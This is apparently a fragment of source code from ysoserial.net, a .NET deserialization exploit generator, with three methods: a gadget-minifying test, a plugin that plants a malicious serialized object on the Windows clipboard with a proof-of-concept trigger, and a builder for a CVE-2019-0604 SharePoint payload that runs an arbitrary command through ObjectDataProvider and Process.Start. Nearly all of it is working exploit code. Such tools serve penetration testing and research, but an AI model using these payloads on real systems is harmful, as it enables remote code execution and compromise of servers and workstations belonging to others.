private void TextFormatterMinifying() { string myApp = "TestConsoleApp_YSONET"; sampleInputArgs = new InputArgs(myApp + " /foo bar", true, false, true, true, true, null); bool isErrOk = false; TextFormattingRunPropertiesGenerator generator = new TextFormattingRunPropertiesGenerator(); byte[] tcd_bf_byte = (byte[])generator.GenerateWithNoTest("binaryformatter", sampleInputArgs); Console.WriteLine("Init size: " + tcd_bf_byte.Length); string json_string = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(tcd_bf_byte), false, true, true); string result = BinaryFormatterMinifier.MinimiseJsonAndRun(json_string, sampleInputArgs, isErrOk, true); Console.WriteLine(result); MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(result); Console.WriteLine("Final size: " + ms.Length); Console.ReadLine(); }
public object Run(string[] args) { // to solve this error: Current thread must be set to single thread apartment (STA) mode before OLE calls can be made // we cannot use the [STAThread] outside of this plugin // here is a solution var staThread = new Thread(delegate() { InputArgs inputArgs = new InputArgs(); List <string> extra; try { extra = options.Parse(args); inputArgs.Cmd = command; inputArgs.Minify = minify; inputArgs.UseSimpleType = useSimpleType; inputArgs.Test = test; } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } object payload = ""; if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } // Creates a new data object. System.Windows.Forms.DataObject myDataObject = new System.Windows.Forms.DataObject(); myDataObject.SetData(format, false, new AxHostStateMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs))); // for System.Windows.Forms /* * myDataObject.SetData(format, new DataSetMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs)), false); // for System.Windows */ Clipboard.Clear(); Clipboard.SetDataObject(myDataObject, true); if (test) { // PoC on how it works in practice try { IDataObject dataObj = Clipboard.GetDataObject(); Object test = dataObj.GetData(format); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } }); staThread.SetApartmentState(ApartmentState.STA); staThread.Start(); staThread.Join(); return("Object copied to the clipboard"); }
public string CVE_2019_0604() { /* * string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema""> * <ExpandedElement/> * <ProjectedProperty0> * <MethodName>Parse</MethodName> * <MethodParameters> * <anyType xsi:type=""xsd:string""> * <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> * </anyType> * </MethodParameters> * <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> * </ProjectedProperty0> * </ExpandedWrapperOfXamlReaderObjectDataProvider>"; * //*/ string payloadPart1 = ""; string payloadPart2 = ""; if (useurl) { InputArgs inputArgs = new InputArgs(); inputArgs.Cmd = "foobar"; inputArgs.IsRawCmd = true; inputArgs.ExtraInternalArguments = new List <String> { "--variant", "3", "--xamlurl", cmd }; inputArgs.Minify = true; inputArgs.UseSimpleType = true; payloadPart1 = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":"; payloadPart1 = payloadPart1.Replace(" ", ""); TextFormattingRunPropertiesGenerator myTFRPG = new TextFormattingRunPropertiesGenerator(); payloadPart2 = (string)myTFRPG.GenerateWithNoTest("DataContractSerializer", inputArgs); } else { payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:"; Boolean hasArgs; string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs); String cmdPart; if (hasArgs) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>"; } payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>"; } //payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding payloadPart2 = XMLMinifier.Minify(payloadPart2, null, null, FormatterType.DataContractXML, true); //Console.WriteLine(payloadPart2); string payload = payloadPart1 + payloadPart2; Console.WriteLine(payload); StringBuilder stringBuilder = new StringBuilder(); stringBuilder.Append("__bp"); HexEncode(checked ((char)(payload.Length << 2)), stringBuilder); HexEncode(payload, stringBuilder); return(stringBuilder.ToString()); }